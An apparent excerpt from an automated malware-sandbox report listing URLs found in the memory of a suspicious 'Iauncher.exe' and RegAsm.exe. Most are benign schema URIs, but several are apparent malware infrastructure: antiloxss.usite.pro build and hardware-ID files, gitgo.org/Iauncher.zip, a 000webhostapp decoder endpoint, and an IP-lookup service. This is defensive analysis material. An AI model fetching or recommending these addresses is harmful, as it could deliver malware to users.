                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtt-
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txt
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txt
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/z-Closing.txt
                          Source: Iauncher.exe, Iauncher.exe, 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: Iauncher.exeString found in binary or memory: https://communitykeyv1.000webhostapp.com/Decoder4.php?string=
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zip
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zip&
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zipd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/516730/what-does-the-visual-studio-any-cpu-target-mean&
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
